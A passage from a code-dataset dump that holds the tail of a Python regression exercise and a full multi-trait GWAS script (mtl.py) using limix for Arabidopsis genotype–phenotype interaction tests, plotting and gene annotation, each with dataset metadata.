in regression function\",\n required=True,\n )\n parser.add_argument(\n \"-y\",\n \"--deg_y\",\n type=int,\n help=\"Degree for y in regression function (optional, Default = 0).\\nif you load data3.csv, this is required.\",\n default=0,\n )\n parser.add_argument(\n \"-l\",\n \"--lam\",\n type=float,\n help=\"Normalization coefficient (optional, Default = 0).\",\n default=0,\n )\n args = parser.parse_args()\n main(args)\n", "sub_path": "ex_3/t_yamamoto/ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 8306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 69, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 93, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 98, 
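The regression_2d and regression_3d helpers above both solve the regularized normal equations w = (Phi^T Phi + lambda*I)^(-1) Phi^T y for a polynomial design matrix Phi. A small self-contained check of that closed form on made-up data (the sample values are hypothetical; np.linalg.solve replaces the explicit inverse here purely as a numerical-stability sketch, it is not the file's own code):

import numpy as np

rng = np.random.default_rng(0)
x = np.linspace(0.0, 1.0, 20)
y = 1.0 + 2.0 * x - 3.0 * x ** 2 + 0.01 * rng.standard_normal(x.size)

deg, lam = 2, 1e-3
phi = np.vander(x, deg + 1, increasing=True)  # columns x**0 .. x**deg, as in regression_2d
w = np.linalg.solve(phi.T @ phi + lam * np.eye(deg + 1), phi.T @ y)
print(w)  # approximately [1, 2, -3] for small lam

As lam grows, the coefficients shrink toward zero; with lam = 0 this reduces to ordinary least squares.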
"usage_type": "call"}, {"api_name": "sympy.latex", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 263, "usage_type": "call"}]} +{"seq_id": "327598811", "text": "\"\"\"\n mtl (multi trait limix)\n author: christian goeschl\n date: 2016-09-16\n\"\"\"\n\nimport csv\nimport sys\nimport time\n\nimport h5py\nimport limix.qtl as qtl\nimport numpy as np\nimport os\nimport pandas as pd\nimport scipy as sp\n\nimport pygwas_modules.kinship as kinship\nimport pygwas_modules.plotting as gplt\nimport pygwas_modules.result as res\nfrom genehunter.core.GeneAnnotationDbExtractor import GeneAnnotationDbExtractor\n\n\nclass MTL:\n def __init__(self, mac_thres=0):\n self.mac_thres = mac_thres\n self.phenotypes = pd.DataFrame()\n # self.snps = None\n # self.iid = None\n self.ibs = None\n self.ts_norm = None\n # self.bnorm_K = None\n # self.used_snp_pos = None\n self.macs = None\n self.mafs 
= None\n # self.chromosomes = None\n # self.chr_names = None\n self.pvalues = None\n\n def read_phenotype_col(self, phenotype_filepath, colnr, colprefix=\"\", sep=None):\n sys.stdout.write(\"reading phenotypes: {}, col: {}\\n\".format(phenotype_filepath, colnr))\n with open(phenotype_filepath, 'U') as phenofile:\n # use the explicit delimiter if one was passed, otherwise sniff it\n if sep is not None:\n reader = csv.reader(phenofile, delimiter=sep)\n else:\n dialect = csv.Sniffer().sniff(phenofile.readline())\n phenofile.seek(0)\n reader = csv.reader(phenofile, dialect=dialect)\n hcols = next(reader)\n\n p = []\n for dcols in reader:\n if len(dcols) == 0:\n continue\n\n try:\n p.append([dcols[0], np.float64(dcols[colnr])])\n except ValueError:\n sys.stdout.write(\n \"excluding accession {} because of trait value {}\\n\".format(dcols[0], dcols[colnr]))\n continue\n\n data = pd.DataFrame(p)\n\n ids = data[0].values\n data.index = ids\n data = data[list(range(1, data.shape[1]))]\n data.columns = [\"_\".join([colprefix, hcols[colnr]])]\n\n if self.phenotypes.size == 0:\n self.phenotypes = data\n else:\n pheno_acc_ids = list(set(self.phenotypes.index) & set(ids))\n self.phenotypes = pd.concat([self.phenotypes.loc[pheno_acc_ids], data.loc[pheno_acc_ids]], axis=1)\n sys.stdout.write(\"phenotype intersection is {} accessions.\\n\".format(len(pheno_acc_ids)))\n\n self.phenotypes.sort_index(axis=0, inplace=True)\n return\n\n def write_phenotypes(self, path):\n self.phenotypes.to_csv(path, sep=',', index=True, index_label=\"Acc_ID\")\n\n def read_genotypes(self, genotype_filepath):\n sys.stdout.write(\"reading genotypes ... \")\n sys.stdout.flush()\n with h5py.File(genotype_filepath, 'r') as genofile:\n geno_acc_ids = list(genofile[\"/accessions\"].value)\n pheno_geno_acc_intersect = list(set(geno_acc_ids) & set(self.phenotypes.index))\n geno_acc_idx = np.in1d(genofile['/accessions'], pheno_geno_acc_intersect)\n snps = genofile[\"/snps\"][:, geno_acc_idx]\n geno_acc_ids = np.array(geno_acc_ids)[geno_acc_idx]\n\n chr_names = genofile['positions'].attrs.get('chrs')\n chr_regions = np.array(genofile['positions'].attrs.get('chr_regions'))\n geno_chroms = []\n for ix, reg in enumerate(chr_regions):\n geno_chroms.extend(np.repeat(chr_names[ix], reg[1] - reg[0]))\n pos = genofile['/positions'].value\n sys.stdout.write(\"ok.\\n\")\n\n macs = np.array(snps.sum(axis=1)).astype(int)\n macs_th = (macs >= self.mac_thres) & (macs <= snps.shape[1] - self.mac_thres)\n snps = snps[macs_th, :]\n sys.stdout.write(\"removed {:d} snps because of MAC threshold {:d}. (Remaining snps: {:d}.)\\n\"\n .format(pos.shape[0] - snps.shape[0], self.mac_thres, snps.shape[0]))\n pos = pos[macs_th]\n geno_chroms = np.array(geno_chroms)[macs_th]\n\n snps = pd.DataFrame(snps, index=pd.MultiIndex.from_arrays([geno_chroms, pos], names=('chr', 'pos')), columns=geno_acc_ids)\n snps = snps.reindex_axis(sorted(snps.columns), axis=1)\n\n accs_no_geno_info = np.array(self.phenotypes.index)[\n np.invert(np.in1d(self.phenotypes.index, pheno_geno_acc_intersect))]\n if accs_no_geno_info.size > 0:\n self.phenotypes.drop(accs_no_geno_info, inplace=True)\n sys.stdout.write(\"no genotype information for accessions: {}. Removed them from list of phenotypes.\\n\".format(\n accs_no_geno_info))\n\n self.ibs = np.array(kinship.calc_ibs_kinship(snps.values))\n\n # # snps.index = pd.MultiIndex.from_arrays([geno_chroms, pos])\n # #geno_acc_ids\n # for ix, reg in enumerate(chr_regions):\n # self.chromosomes[reg[0]:reg[1]] = self.chr_names[ix]\n #\n # self.iid = sorted(list(set(geno_acc_ids) & set(self.phenotypes.index)))\n # del geno_acc_ids\n #\n # sys.stdout.write(\"genotype-phenotype intersection is {} accessions.\\n\".format(len(self.iid)))\n #\n # snps = np.array(snps.loc[self.iid])\n # snpsshape = snps.shape\n #\n #\n # ts = snps[:, macs_th]\n # sys.stdout.write(\"creating kinship matrix ... \")\n # sys.stdout.flush()\n # start = time.time()\n # self.ibs = kinship.calc_ibs_kinship(ts.T)\n #\n # # self.bnorm_K = kinship.scale_k(ibs).astype(np.float64)\n # elapsed = time.time() - start\n # sys.stdout.write(\"ok. ({} s)\\n\".format(elapsed))\n\n # self.used_snp_pos = pos[macs_th]\n self.macs = macs[macs_th]\n self.mafs = self.macs / float(snps.shape[1])\n # self.chromosomes = self.chromosomes[macs_th]\n # ts=sub_snps[:,(sumts(sub_snps.shape[0]*0.01))]\n ts_norm = snps.values.T.astype(float)\n ts_norm = (ts_norm - ts_norm.mean(axis=0)) / ts_norm.std(axis=0)\n self.ts_norm = pd.DataFrame(ts_norm, index=snps.columns, columns=snps.index)\n return\n\n # def create_kinship(self):\n # sys.stdout.write(\"creating kinship matrix ... \")\n # sys.stdout.flush()\n # sub_snps = self.snps.loc[self.iid]\n # sub_snps = np.array(sub_snps)\n # sub_snps = sub_snps.astype(np.float64)\n #\n # # self.snps = self.snps.loc[self.iid]\n # # sumts = self.snps.sum(axis=0)\n # # ts = self.snps[:, (sumts != 0) & (sumts != self.snps.shape[0])]\n # # self.used_snp_pos = self.snps.columns[(sumts != 0) & (sumts != self.snps.shape[0])].astype(np.float64)\n # mac = sub_snps.sum(axis=0)\n # maf = float(mac)/sub_snps.shape[0]\n # ts = sub_snps[:, (mac != 0) & (mac != sub_snps.shape[0])]\n # self.used_snp_pos = self.snps.columns[(mac != 0) & (mac != sub_snps.shape[0])].astype(np.float64)\n # # ts=sub_snps[:,(sumts(sub_snps.shape[0]*0.01))]\n # self.ts_norm = (ts - ts.mean(axis=0)) / ts.std(axis=0)\n #\n # start = time.time()\n # self.ibs = kinship.calc_ibd_kinship(ts.T)\n # elapsed = time.time() - start\n # sys.stdout.write(\"ok. ({} s)\\n\".format(elapsed))\n\n def box_cox_transform(self, values, lambda_range=(-2.0, 2.0), lambda_increment=0.1, verbose=False,\n method='standard'):\n \"\"\"\n Performs the Box-Cox transformation, over different ranges, picking the optimal one with respect to normality.\n \"\"\"\n from scipy import stats\n a = sp.array(values)\n if method == 'standard':\n vals = (a - min(a)) + 0.1 * sp.std(a)\n else:\n vals = a\n sw_pvals = []\n lambdas = sp.arange(lambda_range[0], lambda_range[1] + lambda_increment, lambda_increment)\n for l in lambdas:\n if l == 0:\n vs = sp.log(vals)\n else:\n vs = ((vals ** l) - 1) / l\n r = stats.shapiro(vs)\n if sp.isfinite(r[0]):\n pval = r[1]\n else:\n pval = 0.0\n sw_pvals.append(pval)\n # log.info(sw_pvals)\n i = sp.argmax(sw_pvals)\n l = lambdas[i]\n if l == 0:\n vs = sp.log(vals)\n else:\n vs = ((vals ** l) - 1) / l\n # self._perform_transform(vals,\"box-cox\")\n sys.stdout.write('optimal lambda was %0.1f\\n' % l)\n return vs\n\n def do_qtl(self):\n pheno_norm = self.phenotypes.values.astype(float)\n p1 = pheno_norm[:, 0]\n p2 = pheno_norm[:, 1]\n p1 = (p1 - p1.mean()) / p1.std()\n p2 = (p2 - p2.mean()) / p2.std()\n pheno_norm = np.vstack([p1, p2]).T\n\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = (p1 - p1.min()) / (p1.max() - p1.min())\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = (p2 - p2.min()) / (p2.max() - p2.min())\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n\n # exp transform (does not converge)\n\n # sqrt transform (does not converge)\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = np.sqrt((p1 - p1.min()) + 0.1 * np.std(p1))\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = np.sqrt((p2 - p2.min()) + 0.1 * np.std(p2))\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n # pheno = np.array(self.phenotypes[[0, 1]].loc[self.iid])\n # pheno_norm = (pheno - pheno.mean(axis=0)) / pheno.std(axis=0)\n\n # box - cox - transform (does not converge)\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = self.box_cox_transform(p1)\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = self.box_cox_transform(p2)\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n # ascombe transform (does not converge)\n # p1 = np.array(self.phenotypes[[0]].loc[self.iid]).astype(np.float64)\n # p1 = 2.0 * sp.sqrt(p1 + 3.0 / 8.0)\n # p2 = np.array(self.phenotypes[[1]].loc[self.iid]).astype(np.float64)\n # p2 = 2.0 * sp.sqrt(p2 + 3.0 / 8.0)\n # pheno_norm = np.concatenate((p1, p2), axis=1)\n\n\n\n # QTL\n n_pheno = pheno_norm.shape[1] # number of traits\n # N = len(self.ibs.shape[1]) # number of accessions\n covs = None\n Acovs = None\n K1r = self.ibs\n covar_type = 'freeform'\n\n # Testing for GxE effect\n Asnps0 = sp.ones((1, n_pheno)) # common effects: degree of freedom is 1\n Asnps1 = sp.zeros((2, n_pheno))\n Asnps1[0, :] = 1.0\n Asnps1[1, 0] = 1.0\n\n sys.stdout.write(\"calculating qtl ... \\n\")\n sys.stdout.flush()\n start = time.time()\n self.pvalues = qtl.qtl_test_interaction_lmm_kronecker(snps=self.ts_norm.values, phenos=pheno_norm, covs=covs,\n Acovs=Acovs,\n Asnps0=Asnps0,\n Asnps1=Asnps1, K1r=K1r)\n elapsed = time.time() - start\n sys.stdout.write(\"qtl finished. ({} s)\\n\".format(elapsed))\n\n def write_results(self, outputdir):\n if not os.path.isdir(outputdir):\n sys.stdout.write(\"creating output directory: {} ... \".format(outputdir))\n sys.stdout.flush()\n os.makedirs(outputdir)\n sys.stdout.write(\"ok.\\n\")\n sys.stdout.flush()\n\n sys.stdout.write(\"plotting and writing results ... 
\\n\")\n sys.stdout.flush()\n pvalues_inter = np.array(self.pvalues)\n pvalues_inter = pvalues_inter[:, 0, :]\n\n # if rnr is not None:\n # fileprefix = \"{}-mac{}-run{}\".format(\"-x-\".join(self.phenotypes.columns), self.mac_thres, rnr)\n # else:\n fileprefix = \"{}-mac{}\".format(\"-x-\".join(self.phenotypes.columns), self.mac_thres)\n\n # specific (G x E)\n sys.stdout.write(\"... writing specific interaction results ... \")\n start = time.time()\n\n pos = np.array(list(self.ts_norm.columns.values))\n chr_names = set(pos[:, 0].astype(np.str))\n\n gwas_result = res.GWASResult(chr_names, pos[:, 0].astype(np.str),\n pos[:, 1].astype(np.int), pvalues_inter[0],\n dict(mafs=self.mafs, macs=self.macs),\n additional_columns={})\n # gwas_result.save_as_csv(os.path.join(outputdir, \"{}_specific_pvals.csv\".format(fileprefix)))\n gwas_result.save_as_hdf5(os.path.join(outputdir, \"{}_specific_pvals.hdf5\".format(fileprefix)))\n gplt.plot_gwas_result(gwas_result, os.path.join(outputdir, \"{}_specific_manhattan.png\".format(fileprefix)),\n mac=self.mac_thres)\n gplt.plot_qq(gwas_result, os.path.join(outputdir, \"{}_specific_qq.png\".format(fileprefix)))\n sys.stdout.write(\"ok ({:f} s)\\n\".format(time.time() - start))\n\n # common\n sys.stdout.write(\"... writing common interaction results ... \")\n start = time.time()\n gwas_result = res.GWASResult(chr_names, pos[:, 0].astype(np.str),\n pos[:, 1].astype(np.int), pvalues_inter[1],\n dict(mafs=self.mafs, macs=self.macs),\n additional_columns={})\n # gwas_result.save_as_csv(os.path.join(outputdir, \"{}_common_pvals.csv\".format(fileprefix)))\n gwas_result.save_as_hdf5(os.path.join(outputdir, \"{}_common_pvals.hdf5\".format(fileprefix)))\n gplt.plot_gwas_result(gwas_result, os.path.join(outputdir, \"{}_common_manhattan.png\".format(fileprefix)),\n mac=self.mac_thres)\n gplt.plot_qq(gwas_result, os.path.join(outputdir, \"{}_common_qq.png\".format(fileprefix)))\n sys.stdout.write(\"ok ({:f} s)\\n\".format(time.time() - start))\n\n # any\n sys.stdout.write(\"... writing any interaction results ... 
\")\n start = time.time()\n gwas_result = res.GWASResult(chr_names, pos[:, 0].astype(np.str),\n pos[:, 1].astype(np.int), pvalues_inter[2],\n dict(mafs=self.mafs, macs=self.macs),\n additional_columns={})\n # gwas_result.save_as_csv(os.path.join(outputdir, \"{}_any_pvals.csv\".format(fileprefix)))\n gwas_result.save_as_hdf5(os.path.join(outputdir, \"{}_any_pvals.hdf5\".format(fileprefix)))\n gplt.plot_gwas_result(gwas_result, os.path.join(outputdir, \"{}_any_manhattan.png\".format(fileprefix)),\n mac=self.mac_thres)\n gplt.plot_qq(gwas_result, os.path.join(outputdir, \"{}_any_qq.png\".format(fileprefix)))\n sys.stdout.write(\"ok ({:f} s)\\n\".format(time.time() - start))\n sys.stdout.write(\"ok.\\n\")\n\n def do_genehunter(self, hunter_db, pval_thres=1.0e-5, mac_thres=10, udistance=4000, ddistance=4000, feature_depth=1,\n fdr_alpha=0.05, output_prefix=None):\n dbextract = GeneAnnotationDbExtractor(hunter_db)\n sys.stdout.write(\"gene hunter using database: {}\\n\".format(hunter_db))\n\n all_peaks_df = None\n origin = \"{}-mac{}\".format(\"-x-\".join(self.phenotypes.columns), self.mac_thres)\n interact_labels = [\"specific\", \"common\", \"any\"]\n for interact_ix in range(3):\n select_ix = np.where((self.pvalues[interact_ix][0] <= pval_thres) & (self.macs >= mac_thres))[0]\n if select_ix.size == 0:\n continue\n pos = np.array(list(self.ts_norm.columns.values))\n\n row = pd.Series(index=[\"Original_file\",\n \"Chromosome\",\n \"SNP_pos\",\n \"GWAS_pvalue\",\n \"MAC\",\n \"Bonferroni_{:.3f}_threshold\".format(fdr_alpha),\n \"BH_{:.3f}_threshold\".format(fdr_alpha),\n \"BH_FDR_{:.3f}_adjusted\".format(fdr_alpha),\n \"BH_FDR_{:.3f}_rejected\".format(fdr_alpha),\n \"Gene_start\",\n \"Gene_end\",\n \"Gene_orientation\",\n \"Relative_distance\",\n \"SNP_relative_position\",\n \"Target_AGI\",\n \"Target_element_type\",\n \"Target_sequence_type\",\n \"Target_annotation\",\n \"Target_attributes\"])\n row[\"Original_file\"] = \"{}_{}_pvals\".format(origin, interact_labels[interact_ix])\n # genes_df = none\n for ix in select_ix:\n ext_row = row.copy(deep=True)\n ext_row[\"Chromosome\"] = pos[ix, 0]\n ext_row[\"SNP_pos\"] = pos[ix, 1]\n ext_row[\"GWAS_pvalue\"] = self.pvalues[interact_ix][0][ix]\n ext_row[\"MAC\"] = self.macs[ix]\n\n genes = dbextract.extract_loc_uddist(pos[ix, 0], pos[ix, 1], udistance, ddistance)\n sys.stdout.write(\n \" peak: {}, pos {} -> {} genes in range\\n\".format(pos[ix, 0], pos[ix, 1], len(genes)))\n if len(genes) == 0:\n if all_peaks_df is not None:\n all_peaks_df = pd.concat([all_peaks_df, ext_row.to_frame().transpose()], axis=0,\n ignore_index=True)\n else:\n all_peaks_df = ext_row.to_frame().transpose()\n continue\n\n for g in genes:\n ext_row = pd.Series(row)\n ext_row[\"Gene_start\"] = g.start\n ext_row[\"Gene_end\"] = g.end\n ext_row[\"Gene_orientation\"] = g.strand\n if g.strand == '+':\n ext_row[\"Relative_distance\"] = pos[ix, 1] - g.start\n else:\n ext_row[\"Relative_distance\"] = g.start - pos[ix, 1]\n\n if g.start <= pos[ix, 1] <= g.end:\n ext_row[\"SNP_relative_position\"] = \"in gene\"\n elif pos[ix, 1] < g.start:\n if g.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n if g.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n ext_row[\"Target_AGI\"] = g.id\n ext_row[\"Target_element_type\"] = g.feature\n ext_row[\"Target_sequence_type\"] = g.sequencetype\n ext_row[\"Target_annotation\"] = 
\"NA\"\n ext_row[\"Target_attributes\"] = g.attribute\n\n if all_peaks_df is not None:\n all_peaks_df = pd.concat([all_peaks_df, ext_row.to_frame().transpose()], axis=0,\n ignore_index=True)\n else:\n all_peaks_df = ext_row.to_frame().transpose()\n\n if feature_depth >= 1:\n for rna in g.rna:\n ext_row = pd.Series(row)\n ext_row[\"Gene_start\"] = rna.start\n ext_row[\"Gene_end\"] = rna.end\n ext_row[\"Gene_orientation\"] = rna.strand\n if rna.strand == '+':\n ext_row[\"Relative_distance\"] = pos[ix, 1] - rna.start\n else:\n ext_row[\"Relative_distance\"] = rna.start - pos[ix, 1]\n\n if rna.start <= pos[ix, 1] <= rna.end:\n ext_row[\"SNP_relative_position\"] = \"in feature\"\n elif pos[ix, 1] < rna.start:\n if rna.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n if rna.strand == '+':\n ext_row[\"SNP_relative_position\"] = \"downstream\"\n else:\n ext_row[\"SNP_relative_position\"] = \"upstream\"\n ext_row[\"Target_AGI\"] = rna.id\n ext_row[\"Target_element_type\"] = rna.feature\n ext_row[\"Target_sequence_type\"] = rna.sequencetype\n if rna.short_annotation is not None:\n ext_row[\"Target_annotation\"] = rna.short_annotation\n else:\n ext_row[\"Target_annotation\"] = \"NA\"\n ext_row[\"Target_attributes\"] = rna.attribute\n\n all_peaks_df = pd.concat([all_peaks_df, ext_row.to_frame().transpose()], axis=0,\n ignore_index=True)\n sys.stdout.write(\"\\n\")\n if output_prefix is not None:\n output_prefix = output_prefix.replace(\"_\", \"-\")\n out_path = \"{}_gene-hunter_u{:d}_d{:d}_pval{:.3e}_mac{:d}_fdr{:.3f}.txt\".format(output_prefix,\n udistance,\n ddistance,\n pval_thres,\n mac_thres,\n fdr_alpha)\n out_path = os.path.join(args.dir, out_path)\n all_peaks_df.to_csv(out_path, sep='\\t', header=True, index=False)\n else:\n all_peaks_df.to_string(sys.stdout, header=True, index=False)\n\n\ndef run_by_environment_vars():\n sys.stdout.write(\"MTL run by environment variables.\\n\")\n tfile1 = os.environ['MTL_FILE1']\n tfile2 = os.environ['MTL_FILE2']\n tcols1str = os.environ['MTL_COLS1']\n tcols2str = os.environ['MTL_COLS2']\n tprefix1 = os.environ['MTL_PREFIX1']\n tprefix2 = os.environ['MTL_PREFIX2']\n snpsdb = os.environ['MTL_SNPS']\n macthres = os.environ['MTL_MAC']\n outputdir = os.environ['MTL_OUTDIR']\n jobid = int(os.getenv('PBS_ARRAY_INDEX', '0'))\n filesep = os.getenv('MTL_FILE_SEPARATOR', '\\t')\n\n dogenehunter = os.getenv('MTL_DO_GENEHUNTER', 'true')\n if dogenehunter.lower() == 'true':\n import argparse\n hunter_args = argparse.Namespace()\n hunter_args.db = os.environ['GHUNTER_DB']\n hunter_args.dir = outputdir\n\n sys.stdout.write(\"using the following options:\\n\")\n sys.stdout.write(\"trait file 1 : {}\\n\".format(tfile1))\n sys.stdout.write(\"trait file 2 : {}\\n\".format(tfile2))\n sys.stdout.write(\"file separator : {}\\n\".format(filesep))\n sys.stdout.write(\"column string 1: {}\\n\".format(tcols1str))\n sys.stdout.write(\"column string 2: {}\\n\".format(tcols2str))\n sys.stdout.write(\"prefix 1 : {}\\n\".format(tprefix1))\n sys.stdout.write(\"prefix 2 : {}\\n\".format(tprefix2))\n sys.stdout.write(\"snps database : {}\\n\".format(snpsdb))\n sys.stdout.write(\"mac threshold : {}\\n\".format(macthres))\n sys.stdout.write(\"job ID : {}\\n\".format(jobid))\n\n tcols1 = eval(tcols1str)\n tcols2 = eval(tcols2str)\n # tcols1 = [int(x) for x in tcols1str.lstrip('[').rstrip(']').split(',')]\n # tcols2 = [int(x) for x in tcols2str.lstrip('[').rstrip(']').split(',')]\n\n mt = 
MTL(int(macthres))\n mt.read_phenotype_col(tfile1, tcols1[jobid], tprefix1, sep=filesep)\n mt.read_phenotype_col(tfile2, tcols2[jobid], tprefix2, sep=filesep)\n mt.read_genotypes(snpsdb)\n mt.do_qtl()\n mt.write_results(outputdir)\n\n\nif __name__ == \"__main__\":\n # run_by_environment_vars()\n\n workdir = \"/net/gmi.oeaw.ac.at/busch/lab_new/Christian/mtl-tempstress\"\n genotypedir = \"/data/gwas/genotypes_for_pygwas/1.0.0/regmap_horton_et_al_2012\"\n\n limtmm = MTL(mac_thres=1)\n i = 1\n j = 13\n # limtmm.read_phenotype_col(os.path.join(workdir, \"bao_Std.txt\"), i, colprefix=\"ctrl{:d}\".format(i), sep=\"\\t\")\n # limtmm.read_phenotype_col(os.path.join(workdir, \"bao_Cd+.txt\"), j, colprefix=\"cd+{:d}\".format(j), sep=\"\\t\")\n limtmm.read_phenotype_col(os.path.join(workdir, \"29HT_acc_phenotypes_Brat.txt\"), i, colprefix=\"HT{:d}\".format(i))\n limtmm.read_phenotype_col(os.path.join(workdir, \"Climond_Bio35_busch_lab_all_accessions.csv\"), j, colprefix=\"Cli{:d}\".format(j))\n # limtmm.write_phenotypes(os.path.join(workdir, \"used_phenotypes_dbg_{}-{}.csv\".format(i, j)))\n limtmm.read_genotypes(os.path.join(genotypedir, \"all_chromosomes_binary.hdf5\"))\n limtmm.do_qtl()\n limtmm.write_results(os.path.join(workdir, \"ht-mtl-results\"))\n # limtmm.do_genehunter(\n # \"/home/GMI/christian.goeschl/devel/pycharm/GeneHunter/db/At30_20101214_genes_transposons.sqlite\")\n\n\n # for i in range(3, 23):\n # limtmm = MtmmLimix(mac_thres=5)\n # limtmm.read_phenotype_col(os.path.join(workdir, \"20170301_Zn_MS_RLd2.csv\"), i, colprefix=\"s{:d}\".format(i), sep=\",\")\n # limtmm.read_phenotype_col(os.path.join(workdir, \"20170301_Zn_MS_RLd2.csv\"), 8, colprefix=\"c{:d}\".format(i), sep=\",\")\n # limtmm.read_genotypes(os.path.join(workdir, \"all_chromosomes_binary.hdf5\"))\n # limtmm.do_qtl(os.path.join(workdir, \"debug-strigo-vs-ctrl\"))\n #\n # limtmm = MtmmLimix(mac_thres=5)\n # limtmm.read_phenotype_col(os.path.join(workdir, \"GWASinput_2016_strigolactone_means-na.csv\"), i, colprefix=\"s{:d}\".format(i), sep=\",\")\n # limtmm.read_phenotype_col(os.path.join(workdir, \"GWASinput_2016_control_means-na.csv\"), 8, colprefix=\"c{:d}\".format(i), sep=\",\")\n # limtmm.read_genotypes(os.path.join(workdir, \"all_chromosomes_binary.hdf5\"))\n # limtmm.do_qtl(os.path.join(workdir, \"debug-strigo-vs-ctrl\"))\n", "sub_path": "mtl/mtl.py", "file_name": "mtl.py", "file_ext": "py", "file_size_in_byte": 26677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 41, "usage_type": "attribute"}, {"api_name": "csv.Sniffer", "line_number": 43, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 82, 
